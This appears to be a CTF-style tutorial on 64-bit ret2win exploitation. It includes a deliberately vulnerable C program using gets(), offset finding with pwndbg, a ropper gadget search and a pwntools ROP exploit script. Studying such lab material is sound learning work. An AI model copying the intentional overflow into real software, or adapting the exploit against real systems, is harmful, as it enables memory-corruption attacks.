64-bit

3KB

ret2win_params_x64.zip

archive

Open

The difference between 32-bit and 64-bit binary lies in the Calling Convention. It's basically how arguments/parameters are passed to the function. In x64 architecture, the first 6 arguments are passed on to the registers (RDI, RSI, RDX, RCX, R8, R9) and the rest get pushed onto the stack. Whereas, in x32, all of the arguments are ultimately passed to the stack.

Enough yapping, let's begin

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void rdi_func() {
    asm("pop %rdi; ret");
}

void flag(int check) {
    if(check == 0xFACEB00C) {
        puts("How are you here??");
    } else {
    	puts("So close, yet so far...");
    }
}

void vuln() {
    char buffer[40];

    printf("There's nothing to see here right?\n> ");
    gets(buffer);
}



int main() {
    vuln();
    return 0;
}

I modified the source a little bit, but it should be the same but we will be passing only one parameter due to me having trouble with adding more gadgets (lol)

---

1. Find offset

pwndbg> cyclic 100
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa

 RAX  0x7fffffffdc40 ◂— 'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa'
 RBX  0x7fffffffdd98 —▸ 0x7fffffffe13c ◂— '/home/mfkrypt/pwn_blog/ret2win_params/64-bit/ret2win_paramsx64'
 RCX  0x7ffff7f968e0 (_IO_2_1_stdin_) ◂— 0xfbad2288
 RDX  0
 RDI  0x7ffff7f98720 (_IO_stdfile_0_lock) ◂— 0
 RSI  0x4056b1 ◂— 'aaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa\n'
 R8   0x405715 ◂— 0
 R9   0
 R10  3
 R11  0x246
 R12  0
 R13  0x7fffffffdda8 —▸ 0x7fffffffe17b ◂— 'CLUTTER_IM_MODULE=ibus'
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 R15  0x403e00 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401110 (__do_global_dtors_aux) ◂— endbr64 
 RBP  0x6161616161616167 ('gaaaaaaa')
 RSP  0x7fffffffdc78 ◂— 'haaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa'
 RIP  0x4011b0 (vuln+42) ◂— ret 

We can see this time the Instruction Pointer (RIP) is not populated by the string sequence that we input, this is because in 64-bit programs don't allow invalid memory address in the Instruction Pointer (which the cyclic pattern obviously is) so we read from RSP.

But we only read the starting 8 bytes, since the overflow starts from there .

Another thing to mention is 32-bit addresses tend to be smaller (4 bytes) instead of 64-bit which are 8 bytes. That is why the offset is much larger due to stack alignment (larger saved base pointer (RBP))

pwndbg> cyclic -l haaaaaaa
Finding cyclic pattern of 8 bytes: b'haaaaaaa' (hex: 0x6861616161616161)
Found at offset 56

---

2. Grab the address of flag() using gdb

0x000000000040114f  flag

Notice how larger the address is compared to the 32-bit version?

---

3. Find gadget

• Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.

• ROP gadgets are sequences of CPU instructions that are already present in the program being exploited or its loaded shared libraries and can be used to execute almost any arbitrary code;

We can use ropper to find our gadget. Since our binary only loads one argument, we need to find the pop rdi gadget

❯ ropper --file ret2win_paramsx64 --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi

[INFO] File: ret2win_paramsx64
0x000000000040114a: pop rdi; ret;

Great, we have all the components we need to craft our exploit

---

4. Exploit

from pwn import *

elf = context.binary = ELF('./ret2win_paramsx64',checksec=False)
context.log_level='debug'
io = process()

offset = 56					# Offset found using gdb
flag_address = 0x40114f		# Flag address
pop_rdi = 0x40114a			# Gadget found using ropper
param_1 = 0xFACEB00C		# Parameter 1


payload = b'A' * offset		# padding to RIP first
payload += p64(pop_rdi)		# Gadget first to load the param into the register
payload += p64(param_1)		# pass the param
payload += p64(flag_address)	# Call function

write('payload', payload)    # Write payload into file

io.sendline(payload)
log.info(io.clean())